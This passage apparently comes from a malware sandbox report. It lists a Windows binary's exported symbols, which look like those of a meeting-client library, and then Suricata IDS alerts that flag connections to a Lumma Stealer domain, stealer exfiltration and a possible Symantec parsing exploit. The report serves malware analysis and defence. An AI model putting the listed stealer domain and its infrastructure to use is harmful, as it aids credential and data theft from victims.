              ?s_firsttime@?1???0CSBMBMessage_Doc2ImgConvertFinish@@QAE@XZ@4HA67930x59eb58
              ?s_firsttime@?1???0CSBMBMessage_Doc2ImgConvertProgress@@QAE@XZ@4HA67940x59ec68
              ?s_firsttime@?1???0CSBMBMessage_Doc2ImgStartConvertRequest@@QAE@XZ@4HA67950x59eab8
              ?s_firsttime@?1???0CSBMBMessage_Doc2ImgStartConvertResponse@@QAE@XZ@4HA67960x59eb40
              ?s_firsttime@?1???0CSBMBMessage_DocsShareStartMeetingCollaboratorsInviteInfo@@QAE@XZ@4HA67970x59edc8
              ?s_firsttime@?1???0CSBMBMessage_ECDNInfo@@QAE@XZ@4HA67980x59eba0
              ?s_firsttime@?1???0CSBMBMessage_ECDNSetBackupSuperNodeInfo@@QAE@XZ@4HA67990x59ebd8
              ?s_firsttime@?1???0CSBMBMessage_ECDNUpdateSuperNodeMaxLoad@@QAE@XZ@4HA68000x59eb00
              ?s_firsttime@?1???0CSBMBMessage_EnableQualtricsFeedback@@QAE@XZ@4HA68010x59ef80
              ?s_firsttime@?1???0CSBMBMessage_EnableSubscribePresence@@QAE@XZ@4HA68020x59eea8
              ?s_firsttime@?1???0CSBMBMessage_GetPresence@@QAE@XZ@4HA68030x59ebd4
              ?s_firsttime@?1???0CSBMBMessage_GetPresenceResponse@@QAE@XZ@4HA68040x59eda8
              ?s_firsttime@?1???0CSBMBMessage_HeartBeatRequest@@QAE@XZ@4HA68050x59ee8c
              ?s_firsttime@?1???0CSBMBMessage_HuddlesOnShowAvatarStateChange@@QAE@XZ@4HA68060x59ee10
              ?s_firsttime@?1???0CSBMBMessage_IGotIt@@QAE@XZ@4HA68070x59ecb4
              ?s_firsttime@?1???0CSBMBMessage_IPCSDK_SDKCmdNotify@@QAE@XZ@4HA68080x59ecbc
              ?s_firsttime@?1???0CSBMBMessage_IPCSDK_SDKCmdRequest@@QAE@XZ@4HA68090x59efb8
              ?s_firsttime@?1???0CSBMBMessage_InitThread@@QAE@XZ@4HA68100x59ef54
              ?s_firsttime@?1???0CSBMBMessage_InitUserPolicySettings@@QAE@XZ@4HA68110x59ee14
              ?s_firsttime@?1???0CSBMBMessage_InviteBuddyToMeeting@@QAE@XZ@4HA68120x59ec0c
              ?s_firsttime@?1???0CSBMBMessage_InviteRoomSystemResult@@QAE@XZ@4HA68130x59eedc
              ?s_firsttime@?1???0CSBMBMessage_InviteWinStatus@@QAE@XZ@4HA68140x59ee9c
              ?s_firsttime@?1???0CSBMBMessage_InviteZoomPhoneTokenRequest@@QAE@XZ@4HA68150x59ed9c
              ?s_firsttime@?1???0CSBMBMessage_InviteZoomPhoneTokenResponse@@QAE@XZ@4HA68160x59ed78
              ?s_firsttime@?1???0CSBMBMessage_InviteeCredRequest@@QAE@XZ@4HA68170x59eaa8
              ?s_firsttime@?1???0CSBMBMessage_InviteeCredResponse@@QAE@XZ@4HA68180x59ec34
              ?s_firsttime@?1???0CSBMBMessage_InviteeIakRequest@@QAE@XZ@4HA68190x59ee74
              ?s_firsttime@?1???0CSBMBMessage_InviteeIakResponse@@QAE@XZ@4HA68200x59ef30
              ?s_firsttime@?1???0CSBMBMessage_JoinCompliantMeetingAutoCall@@QAE@XZ@4HA68210x59edac
              ?s_firsttime@?1???0CSBMBMessage_KeepAlive@@QAE@XZ@4HA68220x59ee94
              ?s_firsttime@?1???0CSBMBMessage_LCPRecordOperate@@QAE@XZ@4HA68230x59ee18
              ?s_firsttime@?1???0CSBMBMessage_LeaveBeforeMeetingStartNotify@@QAE@XZ@4HA68240x59ea9c
              ?s_firsttime@?1???0CSBMBMessage_LeaveConfErrorDesc@@QAE@XZ@4HA68250x59ec9c
              ?s_firsttime@?1???0CSBMBMessage_LogService_StartChannel@@QAE@XZ@4HA68260x59edb0
              ?s_firsttime@?1???0CSBMBMessage_LogService_StopChannel@@QAE@XZ@4HA68270x59ed5c
              ?s_firsttime@?1???0CSBMBMessage_LogService_SubChannelAdd@@QAE@XZ@4HA68280x59eb34
              ?s_firsttime@?1???0CSBMBMessage_LogService_SubChannelRemove@@QAE@XZ@4HA68290x59ed30
              ?s_firsttime@?1???0CSBMBMessage_MakeCallLogInfo@@QAE@XZ@4HA68300x59f010
              ?s_firsttime@?1???0CSBMBMessage_MediaAPIRequest@@QAE@XZ@4HA68310x59ec58
              ?s_firsttime@?1???0CSBMBMessage_MediaAPIResponse@@QAE@XZ@4HA68320x59ecd4
              ?s_firsttime@?1???0CSBMBMessage_MeetingCacheBytesKVOperate@@QAE@XZ@4HA68330x59ec70
              ?s_firsttime@?1???0CSBMBMessage_MeetingDiagInfo@@QAE@XZ@4HA68340x59ea60
              ?s_firsttime@?1???0CSBMBMessage_MeetingPAAPToggleEvent@@QAE@XZ@4HA68350x59ea30
              ?s_firsttime@?1???0CSBMBMessage_MeetingWallpaperStartDownload@@QAE@XZ@4HA68360x59ee7c
              ?s_firsttime@?1???0CSBMBMessage_MeetingWallpaperThumbStartDownload@@QAE@XZ@4HA68370x59eeac
              ?s_firsttime@?1???0CSBMBMessage_MeshNotification@@QAE@XZ@4HA68380x59eb08
              ?s_firsttime@?1???0CSBMBMessage_MyMeetingStatus@@QAE@XZ@4HA68390x59ef78
              ?s_firsttime@?1???0CSBMBMessage_NotifyActivateConf@@QAE@XZ@4HA68400x59ebe0
              ?s_firsttime@?1???0CSBMBMessage_NotifyAfterInit@@QAE@XZ@4HA68410x59ead4
              ?s_firsttime@?1???0CSBMBMessage_NotifyAfterObjCreated@@QAE@XZ@4HA68420x59ee5c
              ?s_firsttime@?1???0CSBMBMessage_NotifyAppActive@@QAE@XZ@4HA68430x59ea10
              ?s_firsttime@?1???0CSBMBMessage_NotifyAppEvent@@QAE@XZ@4HA68440x59ecec
              ?s_firsttime@?1???0CSBMBMessage_NotifyAppInActive@@QAE@XZ@4HA68450x59ecd8
              ?s_firsttime@?1???0CSBMBMessage_NotifyAssistantStart@@QAE@XZ@4HA68460x59ed50
              ?s_firsttime@?1???0CSBMBMessage_NotifyAssistantStop@@QAE@XZ@4HA68470x59ecdc
              ?s_firsttime@?1???0CSBMBMessage_NotifyBandwidthLimitUpdate@@QAE@XZ@4HA68480x59eb78
              ?s_firsttime@?1???0CSBMBMessage_NotifyBeforeObjDestroyed@@QAE@XZ@4HA68490x59ece8
              ?s_firsttime@?1???0CSBMBMessage_NotifyBeforeTerm@@QAE@XZ@4HA68500x59eac0
              ?s_firsttime@?1???0CSBMBMessage_NotifyCallCommand@@QAE@XZ@4HA68510x59ebb8
              ?s_firsttime@?1???0CSBMBMessage_NotifyChangeBargeEmergencyCallStatus@@QAE@XZ@4HA68520x59ebf0
              ?s_firsttime@?1???0CSBMBMessage_NotifyCheckUpdateResponse@@QAE@XZ@4HA68530x59ef14
              ?s_firsttime@?1???0CSBMBMessage_NotifyClaimHost@@QAE@XZ@4HA68540x59eb54
              ?s_firsttime@?1???0CSBMBMessage_NotifyClientRegistry@@QAE@XZ@4HA68550x59eeb8
              ?s_firsttime@?1???0CSBMBMessage_NotifyClientUnRegistry@@QAE@XZ@4HA68560x59ef94
              ?s_firsttime@?1???0CSBMBMessage_NotifyConfPListChanged@@QAE@XZ@4HA68570x59ec4c
              ?s_firsttime@?1???0CSBMBMessage_NotifyConfSelected@@QAE@XZ@4HA68580x59ef9c
              ?s_firsttime@?1???0CSBMBMessage_NotifyConfStart@@QAE@XZ@4HA68590x59ea38
              ?s_firsttime@?1???0CSBMBMessage_NotifyConfStop@@QAE@XZ@4HA68600x59ed88
              ?s_firsttime@?1???0CSBMBMessage_NotifyConfTokenResult@@QAE@XZ@4HA68610x59eac8
              ?s_firsttime@?1???0CSBMBMessage_NotifyConfZRMeetingInfo@@QAE@XZ@4HA68620x59eb5c
              ?s_firsttime@?1???0CSBMBMessage_NotifyConferenceStatus@@QAE@XZ@4HA68630x59eb10
              ?s_firsttime@?1???0CSBMBMessage_NotifyCustom3DAvatarFileIdUpdated@@QAE@XZ@4HA68640x59ec84
              ?s_firsttime@?1???0CSBMBMessage_NotifyDeviceReady@@QAE@XZ@4HA68650x59efe4
              ?s_firsttime@?1???0CSBMBMessage_NotifyDownloadProgress@@QAE@XZ@4HA68660x59ef1c
              ?s_firsttime@?1???0CSBMBMessage_NotifyEndSetting@@QAE@XZ@4HA68670x59ee6c
              ?s_firsttime@?1???0CSBMBMessage_NotifyInvitationSent@@QAE@XZ@4HA68680x59ed28
              ?s_firsttime@?1???0CSBMBMessage_NotifyInviteFBBuddy@@QAE@XZ@4HA68690x59ee38
              ?s_firsttime@?1???0CSBMBMessage_NotifyJoinByMeetingNumber@@QAE@XZ@4HA68700x59ef6c
              ?s_firsttime@?1???0CSBMBMessage_NotifyJoinFailForForceUpdate@@QAE@XZ@4HA68710x59ee50
              ?s_firsttime@?1???0CSBMBMessage_NotifyLeaveConf@@QAE@XZ@4HA68720x59ed7c
              ?s_firsttime@?1???0CSBMBMessage_NotifyMeetingCallResponse@@QAE@XZ@4HA68730x59ed70
              ?s_firsttime@?1???0CSBMBMessage_NotifyMeetingCustom3DAvatarElementThumbnailDownloaded@@QAE@XZ@4HA68740x59efd8
              ?s_firsttime@?1???0CSBMBMessage_NotifyMeetingEmojiDownloadStatus@@QAE@XZ@4HA68750x59edcc
              ?s_firsttime@?1???0CSBMBMessage_NotifyMeetingFaceMakeupDownloaded@@QAE@XZ@4HA68760x59ee64
              ?s_firsttime@?1???0CSBMBMessage_NotifyMeetingImageDownloaded@@QAE@XZ@4HA68770x59eb60
              ?s_firsttime@?1???0CSBMBMessage_NotifyMeetingParamChanged@@QAE@XZ@4HA68780x59eda4
              ?s_firsttime@?1???0CSBMBMessage_NotifyMeetingWallpaperDownloadStatus@@QAE@XZ@4HA68790x59eaac
              ?s_firsttime@?1???0CSBMBMessage_NotifyNetworkStateChanged@@QAE@XZ@4HA68800x59ec74
              ?s_firsttime@?1???0CSBMBMessage_NotifyNetworkSwitch@@QAE@XZ@4HA68810x59ebf8
              ?s_firsttime@?1???0CSBMBMessage_NotifyOpenDialPad@@QAE@XZ@4HA68820x59ecac
              ?s_firsttime@?1???0CSBMBMessage_NotifyOpenUrlWithAuth@@QAE@XZ@4HA68830x59ed14
              ?s_firsttime@?1???0CSBMBMessage_NotifyPTAddContact@@QAE@XZ@4HA68840x59ee80
              ?s_firsttime@?1???0CSBMBMessage_NotifyPTCallPeer@@QAE@XZ@4HA68850x59eeec
              ?s_firsttime@?1???0CSBMBMessage_NotifyPTCleanIDPToken@@QAE@XZ@4HA68860x59eef8
              ?s_firsttime@?1???0CSBMBMessage_NotifyPTDeviceInfo@@QAE@XZ@4HA68870x59ea80
              ?s_firsttime@?1???0CSBMBMessage_NotifyPTFeedbackInfo@@QAE@XZ@4HA68880x59eb98
              ?s_firsttime@?1???0CSBMBMessage_NotifyPTLoginInfo@@QAE@XZ@4HA68890x59ef5c
              ?s_firsttime@?1???0CSBMBMessage_NotifyReceivedSelectMe@@QAE@XZ@4HA68900x59ede8
              ?s_firsttime@?1???0CSBMBMessage_NotifyRunningLate@@QAE@XZ@4HA68910x59ef50
              ?s_firsttime@?1???0CSBMBMessage_NotifySaveChat@@QAE@XZ@4HA68920x59efc4
              ?s_firsttime@?1???0CSBMBMessage_NotifySaveFileInMeetingChat@@QAE@XZ@4HA68930x59ea40
              ?s_firsttime@?1???0CSBMBMessage_NotifyShareFileInMeetingChat@@QAE@XZ@4HA68940x59ecc4
              ?s_firsttime@?1???0CSBMBMessage_NotifyStartAppShare@@QAE@XZ@4HA68950x59ef18
              ?s_firsttime@?1???0CSBMBMessage_NotifyStartDocsShare@@QAE@XZ@4HA68960x59ebfc
              ?s_firsttime@?1???0CSBMBMessage_NotifyStartLogin@@QAE@XZ@4HA68970x59ed6c
              ?s_firsttime@?1???0CSBMBMessage_NotifyStartRecording@@QAE@XZ@4HA68980x59ea0c
              ?s_firsttime@?1???0CSBMBMessage_NotifyStartSetting@@QAE@XZ@4HA68990x59ea68
              ?s_firsttime@?1???0CSBMBMessage_NotifyStartWhiteboardShare@@QAE@XZ@4HA69000x59eddc
              ?s_firsttime@?1???0CSBMBMessage_NotifyUpdateDisclaimerStatus@@QAE@XZ@4HA69010x59edec
              ?s_firsttime@?1???0CSBMBMessage_NotifyUpgradeAccount@@QAE@XZ@4HA69020x59ea74
              ?s_firsttime@?1???0CSBMBMessage_NotifyUserInputProxyAuth@@QAE@XZ@4HA69030x59ea90
              ?s_firsttime@?1???0CSBMBMessage_NotifyUserPropertiesChanged@@QAE@XZ@4HA69040x59ec24
              ?s_firsttime@?1???0CSBMBMessage_NotifyVideoLayoutDownloadStatus@@QAE@XZ@4HA69050x59f000
              ?s_firsttime@?1???0CSBMBMessage_Notify_PT_Process_PID@@QAE@XZ@4HA69060x59eed4
              ?s_firsttime@?1???0CSBMBMessage_Notify_ZPNS_MeetingStart@@QAE@XZ@4HA69070x59eea4
              ?s_firsttime@?1???0CSBMBMessage_OnZPFeatureNotification@@QAE@XZ@4HA69080x59ec5c
              ?s_firsttime@?1???0CSBMBMessage_OpenInviteRoomSystemCalloutTab@@QAE@XZ@4HA69090x59ee40
              ?s_firsttime@?1???0CSBMBMessage_OpenLoginPanelForGuest@@QAE@XZ@4HA69100x59ed10
              ?s_firsttime@?1???0CSBMBMessage_OperateAudioFacilityParam@@QAE@XZ@4HA69110x59eb70
              ?s_firsttime@?1???0CSBMBMessage_OperateChatFacilityParam@@QAE@XZ@4HA69120x59eebc
              ?s_firsttime@?1???0CSBMBMessage_OperateScreenShareFacilityParam@@QAE@XZ@4HA69130x59ef60
              ?s_firsttime@?1???0CSBMBMessage_OperateVideoFacilityParam@@QAE@XZ@4HA69140x59eb80
              ?s_firsttime@?1???0CSBMBMessage_OutlookGetMAPICalendarEvents@@QAE@XZ@4HA69150x59ea00
              ?s_firsttime@?1???0CSBMBMessage_OutlookMAPIEventChangeNotify@@QAE@XZ@4HA69160x59e9f8
              ?s_firsttime@?1???0CSBMBMessage_OutlookOnGetDefaultProfileNotify@@QAE@XZ@4HA69170x59e9fc
              ?s_firsttime@?1???0CSBMBMessage_OutlookOnGetMAPICalendarEventsNotify@@QAE@XZ@4HA69180x59e9f4
              ?s_firsttime@?1???0CSBMBMessage_OutlookRequest@@QAE@XZ@4HA69190x59ed0c
              ?s_firsttime@?1???0CSBMBMessage_OutlookResponse@@QAE@XZ@4HA69200x59edc0
              ?s_firsttime@?1???0CSBMBMessage_OutlookStartMeetingRequest@@QAE@XZ@4HA69210x59eaf4
              ?s_firsttime@?1???0CSBMBMessage_OutlookStartMeetingResponse@@QAE@XZ@4HA69220x59ef8c
              ?s_firsttime@?1???0CSBMBMessage_Outlook_IMIntegration_GetContactInfo_Request@@QAE@XZ@4HA69230x59ee2c
              ?s_firsttime@?1???0CSBMBMessage_Outlook_IMIntegration_GetContactInfo_Response@@QAE@XZ@4HA69240x59eefc
              ?s_firsttime@?1???0CSBMBMessage_Outlook_IMIntegration_PhotoChanged_Notification@@QAE@XZ@4HA69250x59f008
              ?s_firsttime@?1???0CSBMBMessage_Outlook_IMIntegration_SelfEmail_Response@@QAE@XZ@4HA69260x59ee48
              ?s_firsttime@?1???0CSBMBMessage_Outlook_IMIntegration_StartAudio_Request@@QAE@XZ@4HA69270x59ec20
              ?s_firsttime@?1???0CSBMBMessage_Outlook_IMIntegration_StartChat_Request@@QAE@XZ@4HA69280x59edf0
              ?s_firsttime@?1???0CSBMBMessage_Outlook_IMIntegration_StartVideo_Request@@QAE@XZ@4HA69290x59eda0
              ?s_firsttime@?1???0CSBMBMessage_PMCCheckInTeamChatReq@@QAE@XZ@4HA69300x59ed1c
              ?s_firsttime@?1???0CSBMBMessage_PMCCheckInTeamChatRsp@@QAE@XZ@4HA69310x59ef88
              ?s_firsttime@?1???0CSBMBMessage_PMCMeetChatMsgDeepLinkReq@@QAE@XZ@4HA69320x59ed40
              ?s_firsttime@?1???0CSBMBMessage_PMCMeetChatMsgReaded@@QAE@XZ@4HA69330x59eff0
              ?s_firsttime@?1???0CSBMBMessage_PMCMeetingEnded@@QAE@XZ@4HA69340x59ef10
              ?s_firsttime@?1???0CSBMBMessage_PMCOpenTeamChatReq@@QAE@XZ@4HA69350x59ea5c
              ?s_firsttime@?1???0CSBMBMessage_PMCOpenTeamChatRsp@@QAE@XZ@4HA69360x59ed54
              ?s_firsttime@?1???0CSBMBMessage_PMCQueryDefaultGiphyReq@@QAE@XZ@4HA69370x59ebe4
              ?s_firsttime@?1???0CSBMBMessage_PMCQueryDefaultGiphyRsp@@QAE@XZ@4HA69380x59ee1c
              ?s_firsttime@?1???0CSBMBMessage_PMCTeamChatUpdated@@QAE@XZ@4HA69390x59ea3c
              ?s_firsttime@?1???0CSBMBMessage_PSCancelDownloadComponent@@QAE@XZ@4HA69400x59ec80
              ?s_firsttime@?1???0CSBMBMessage_PSComponentDownloadProgress@@QAE@XZ@4HA69410x59ef20
              ?s_firsttime@?1???0CSBMBMessage_PSComponentDownloadResult@@QAE@XZ@4HA69420x59eae0
              ?s_firsttime@?1???0CSBMBMessage_PSPTCustomMessage@@QAE@XZ@4HA69430x59eb64
              ?s_firsttime@?1???0CSBMBMessage_PSPTNotify3DAvatarEnable@@QAE@XZ@4HA69440x59edb8
              ?s_firsttime@?1???0CSBMBMessage_PSQueryComponentExist@@QAE@XZ@4HA69450x59ed74
              ?s_firsttime@?1???0CSBMBMessage_PSQueryComponentExistResult@@QAE@XZ@4HA69460x59ec48
              ?s_firsttime@?1???0CSBMBMessage_PSStartDownloadComponent@@QAE@XZ@4HA69470x59ede0
              ?s_firsttime@?1???0CSBMBMessage_PS_PSAsyncRecordingUploadResult@@QAE@XZ@4HA69480x59ee28
              ?s_firsttime@?1???0CSBMBMessage_PS_PSResponseToTerm@@QAE@XZ@4HA69490x59ee34
              ?s_firsttime@?1???0CSBMBMessage_PS_PTRequestActiveAppEx@@QAE@XZ@4HA69500x59eb7c
              ?s_firsttime@?1???0CSBMBMessage_PS_PTRequestToTerm@@QAE@XZ@4HA69510x59ed04
              ?s_firsttime@?1???0CSBMBMessage_PS_PTReturnAsyncRecordingActionToken@@QAE@XZ@4HA69520x59ebf4
              ?s_firsttime@?1???0CSBMBMessage_PS_UpdateAccountInfo@@QAE@XZ@4HA69530x59ea98
              ?s_firsttime@?1???0CSBMBMessage_PS_UpdateKeyValueInfo@@QAE@XZ@4HA69540x59ed34
              ?s_firsttime@?1???0CSBMBMessage_PairRelationTokenRequest@@QAE@XZ@4HA69550x59ebe8
              ?s_firsttime@?1???0CSBMBMessage_PairRelationTokenResponse@@QAE@XZ@4HA69560x59ef00
              ?s_firsttime@?1???0CSBMBMessage_PolicyUpdated@@QAE@XZ@4HA69570x59eba8
              ?s_firsttime@?1???0CSBMBMessage_PromptProxyAuth@@QAE@XZ@4HA69580x59eb1c
              ?s_firsttime@?1???0CSBMBMessage_RealNameAuthInfo@@QAE@XZ@4HA69590x59efc0
              ?s_firsttime@?1???0CSBMBMessage_RecaptchaRequest@@QAE@XZ@4HA69600x59ee88
              ?s_firsttime@?1???0CSBMBMessage_RemoveCustom3DAvatarToWeb@@QAE@XZ@4HA69610x59efa0
              ?s_firsttime@?1???0CSBMBMessage_RemoveFromCameraControlGroup@@QAE@XZ@4HA69620x59ecb0
              ?s_firsttime@?1???0CSBMBMessage_ReportIssue@@QAE@XZ@4HA69630x59ee4c
              ?s_firsttime@?1???0CSBMBMessage_RequestMyIDPToken@@QAE@XZ@4HA69640x59ed24
              ?s_firsttime@?1???0CSBMBMessage_RequestUpdateAICAdminSetting@@QAE@XZ@4HA69650x59eb68
              ?s_firsttime@?1???0CSBMBMessage_SaveCustom3DAvatarToWeb@@QAE@XZ@4HA69660x59eed0
              ?s_firsttime@?1???0CSBMBMessage_SettingUpdated@@QAE@XZ@4HA69670x59efb0
              ?s_firsttime@?1???0CSBMBMessage_ShareMeetingChatReq@@QAE@XZ@4HA69680x59ede4
              ?s_firsttime@?1???0CSBMBMessage_ShareMeetingChatRsp@@QAE@XZ@4HA69690x59ef2c
              ?s_firsttime@?1???0CSBMBMessage_StartCallOutInfo@@QAE@XZ@4HA69700x59ee44
              ?s_firsttime@?1???0CSBMBMessage_StartDownloadComponent@@QAE@XZ@4HA69710x59ed2c
              ?s_firsttime@?1???0CSBMBMessage_StartMeetingWithHostKey@@QAE@XZ@4HA69720x59ea24
              ?s_firsttime@?1???0CSBMBMessage_SubscribePresenceExpire@@QAE@XZ@4HA69730x59ea4c
              ?s_firsttime@?1???0CSBMBMessage_TermConf@@QAE@XZ@4HA69740x59eab0
              ?s_firsttime@?1???0CSBMBMessage_TermThread@@QAE@XZ@4HA69750x59ed48
              ?s_firsttime@?1???0CSBMBMessage_TrackingPAAPEvent@@QAE@XZ@4HA69760x59ec78
              ?s_firsttime@?1???0CSBMBMessage_UpdateCallSessionSummaryResponse@@QAE@XZ@4HA69770x59edfc
              ?s_firsttime@?1???0CSBMBMessage_UpdateCustom3DAvatarToWeb@@QAE@XZ@4HA69780x59ee84
              ?s_firsttime@?1???0CSBMBMessage_UpdateFeatureToggle@@QAE@XZ@4HA69790x59ed08
              ?s_firsttime@?1???0CSBMBMessage_UpdateKeyValueInfo@@QAE@XZ@4HA69800x59ee3c
              ?s_firsttime@?1???0CSBMBMessage_UpdateLaunchConfParam@@QAE@XZ@4HA69810x59eea0
              ?s_firsttime@?1???0CSBMBMessage_UpdateOpFlags@@QAE@XZ@4HA69820x59ea6c
              ?s_firsttime@?1???0CSBMBMessage_UpdateRegisterServer@@QAE@XZ@4HA69830x59eff8
              ?s_firsttime@?1???0CSBMBMessage_UploadExceptionMemoryLog@@QAE@XZ@4HA69840x59eb50
              ?s_firsttime@?1???0CSBMBMessage_UploadFeedback@@QAE@XZ@4HA69850x59ec54
              ?s_firsttime@?1???0CSBMBMessage_UploadPbxRealTimeMonitorLog@@QAE@XZ@4HA69860x59ef24
              ?s_firsttime@?1???0CSBMBMessage_UserInTrustListInfo@@QAE@XZ@4HA69870x59eb94
              ?s_firsttime@?1???0CSBMBMessage_UserUpdateName@@QAE@XZ@4HA69880x59eeb4
              ?s_firsttime@?1???0CSBMBMessage_UserUploadPicture@@QAE@XZ@4HA69890x59edc4
              ?s_firsttime@?1???0CSBMBMessage_VCardDataRequest@@QAE@XZ@4HA69900x59eff4
              ?s_firsttime@?1???0CSBMBMessage_VCardDataResponse@@QAE@XZ@4HA69910x59ec04
              ?s_firsttime@?1???0CSBMBMessage_VCardFetchManagerInfo@@QAE@XZ@4HA69920x59eb88
              ?s_firsttime@?1???0CSBMBMessage_VCardSetBuddyStar@@QAE@XZ@4HA69930x59ec98
              ?s_firsttime@?1???0CSBMBMessage_VDIPluginPublicIP@@QAE@XZ@4HA69940x59ed8c
              ?s_firsttime@?1???0CSBMBMessage_VDI_Chrome_JoinErrorInfo@@QAE@XZ@4HA69950x59efb4
              ?s_firsttime@?1???0CSBMBMessage_VDI_DiagLog_Content@@QAE@XZ@4HA69960x59ebac
              ?s_firsttime@?1???0CSBMBMessage_VDI_Plugin_Info@@QAE@XZ@4HA69970x59ec1c
              ?s_firsttime@?1???0CSBMBMessage_VTLSBypassFromWeb@@QAE@XZ@4HA69980x59ee08
              ?s_firsttime@?1???0CSBMBMessage_VTLSConfirm@@QAE@XZ@4HA69990x59eb74
              ?s_firsttime@?1???0CSBMBMessage_VTLSPrompt@@QAE@XZ@4HA70000x59f00c
              ?s_firsttime@?1???0CSBMBMessage_WEBCLIENT_SEND_TO_ZR@@QAE@XZ@4HA70010x59ef44
              ?s_firsttime@?1???0CSBMBMessage_ZR_SEND_TO_WEBCLIENT@@QAE@XZ@4HA70020x59ee0c
              ?s_firsttime@?1???0CSBMBMessage_ZoomInternalNavigateURLEvent@@QAE@XZ@4HA70030x59ed44
              ?s_firsttime@?1???0CSBMBMessage_ZpnsUpdateHuddlesSettings@@QAE@XZ@4HA70040x59ed4c
              ?s_firsttime@?1???0CSBMessage_Assistant_AudioDeviceUpdateNotification@@QAE@XZ@4HA70050x59ed84
              ?s_firsttime@?1???0CSBMessage_Assistant_AudioQualityNotification@@QAE@XZ@4HA70060x59ef08
              ?s_firsttime@?1???0SBIPCMessage_Connect@@QAE@XZ@4HA70070x59f024
              ?s_firsttime@?1???0SBIPCMessage_ConnectResponse@@QAE@XZ@4HA70080x59f01c
              ?s_firsttime@?1???0SBIPCMessage_DisConnect@@QAE@XZ@4HA70090x59f020
              ?set@StringPiece@Cmm@@QAEXPBD@Z70100x411120
              ?set@StringPiece@Cmm@@QAEXPBDI@Z70110x411100
              ?set@StringPiece@Cmm@@QAEXPBXI@Z70120x411100
              ?set_listener@Channel@ssb_ipc@@QAEXPAVListener@12@@Z70130x45cb50
              ?size@?$CStringT@D@Cmm@@QBEIXZ70140x403ad0
              ?size@?$CStringT@_W@Cmm@@QBEIXZ70150x403ad0
              ?size@DictionaryValue@@QBEIXZ70160x44bcc0
              ?size@StringPiece@Cmm@@QBEIXZ70170x40c640
              ?stack_timecost_threashold_@CCmmPerfTelemetry@@0KA70180x59f080
              ?starts_with@StringPiece@Cmm@@QBE_NABV12@@Z70190x4111f0
              ?stepping@CPU@Cmm@@QBEHXZ70200x44bcc0
              ?stream@LogMessage@logging@@QAEAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@XZ70210x44bb90
              ?substr@?$CStringT@D@Cmm@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@II@Z70220x4066b0
              ?substr@?$CStringT@_W@Cmm@@QBE?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@II@Z70230x404890
              ?substr@StringPiece@Cmm@@QBE?AV12@II@Z70240x45a4c0
              ?swap@?$CStringT@D@Cmm@@QAEXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z70250x404710
              ?swap@?$CStringT@_W@Cmm@@QAEXAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z70260x404710
              ?threadTelemetryMap_@CCmmPerfTelemetry@@0V?$unordered_map@Vid@thread@std@@V?$shared_ptr@VThreadEvents@CCmmPerfTelemetry@@@3@U?$hash@Vid@thread@std@@@3@U?$equal_to@Vid@thread@std@@@3@V?$allocator@U?$pair@$$CBVid@thread@std@@V?$shared_ptr@VThreadEvents@CCmmPerfTelemetry@@@3@@std@@@3@@std@@A70270x5afaf8
              ?thread_proc_@CCmmPerfTelemetry@@0VCCmmPerfTelemetryThreadProc@@A70280x59f0c0
              ?type@CPU@Cmm@@QBEHXZ70290x40c630
              ?unique_id_@CCmmPerfTelemetry@@0V?$unordered_map@V?$CStringT@_W@Cmm@@V12@U?$hash@V?$CStringT@_W@Cmm@@@std@@U?$equal_to@V?$CStringT@_W@Cmm@@@4@V?$allocator@U?$pair@$$CBV?$CStringT@_W@Cmm@@V12@@std@@@4@@std@@A70300x5afabc
              ?utf8Value@FilePath@Cmm@@QBE?AV?$CStringT@D@2@XZ70310x411360
              ?value@FilePath@Cmm@@QBEABV?$CStringT@_W@2@XZ70320x411350
              ?vendor_name@CPU@Cmm@@QBEABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ70330x44bcb0
              ?wordmemcmp@StringPiece@Cmm@@SAHPBD0I@Z70340x4112b0
              ?work_thread_@CCmmPerfTelemetry@@0VCThread@Cmm@@A70350x5afb18
              ?writeBoolFalse@XMLUtil@tinyxml2@@0PBDB70360x59f028
              ?writeBoolTrue@XMLUtil@tinyxml2@@0PBDB70370x59f02c
              CmmMQ_GetService70380x46dd10
              CmmMQ_InitService70390x402d00
              CmmMQ_TermService70400x402d00
              cmm_astr_chri70410x4132c0
              cmm_astr_lwr70420x413540
              cmm_astr_ncat70430x413c10
              cmm_astr_ncpy70440x413bb0
              cmm_astr_rchri70450x413320
              cmm_astr_rstri70460x413400
              cmm_astr_stri70470x4133c0
              cmm_astr_upr70480x4134d0
              cmm_fs_find_first70490x413070
              cmm_fs_search70500x413290
              cmm_fs_write70510x413010
              cmm_wstr_chri70520x4132f0
              cmm_wstr_lwr70530x413570
              cmm_wstr_ncat70540x413c50
              cmm_wstr_ncpy70550x413be0
              cmm_wstr_rchri70560x413370
              cmm_wstr_rstri70570x413460
              cmm_wstr_stri70580x4133e0
              cmm_wstr_upr70590x413500

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Suricata IDS Alerts

              TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
              2024-07-27T11:25:08.531260+0200TCP2054603ET MALWARE Lumma Stealer Domain in TLS SNI (outpointsozp .shop)49733443192.168.2.4188.114.97.3
              2024-07-27T11:25:13.089587+0200TCP2054603ET MALWARE Lumma Stealer Domain in TLS SNI (outpointsozp .shop)49736443192.168.2.4188.114.97.3
              2024-07-27T11:25:05.948522+0200TCP2054603ET MALWARE Lumma Stealer Domain in TLS SNI (outpointsozp .shop)49731443192.168.2.4188.114.97.3
              2024-07-27T11:25:14.578751+0200TCP2054603ET MALWARE Lumma Stealer Domain in TLS SNI (outpointsozp .shop)49737443192.168.2.4188.114.97.3
              2024-07-27T11:25:17.261560+0200TCP2054603ET MALWARE Lumma Stealer Domain in TLS SNI (outpointsozp .shop)49738443192.168.2.4188.114.97.3
              2024-07-27T11:25:19.539733+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973913.85.23.86192.168.2.4
              2024-07-27T11:25:09.041971+0200TCP2048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration49733443192.168.2.4188.114.97.3
